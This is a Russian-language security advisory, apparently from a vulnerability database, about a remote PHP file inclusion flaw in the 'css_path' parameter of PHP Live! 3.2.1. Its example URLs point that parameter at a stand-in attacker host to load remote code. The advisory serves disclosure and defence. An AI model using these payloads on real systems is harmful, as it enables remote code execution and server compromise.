PHP-инклюдинг в PHP Live!

Дата публикации:
25.07.2006
Дата изменения:
17.10.2006
Всего просмотров:
5788
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP Live! 3.x
Уязвимые версии: PHP Live! 3.2.1, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "css_path" в сценариях help.php и setup/header.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

help.php?css_path=htt://attacker
setup/header.php?css_path=htt://attacker

URL производителя: www.phplivesupport.com

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: PHPLive 3.2 Remote Injection Vulnerability

или введите имя

CAPTCHA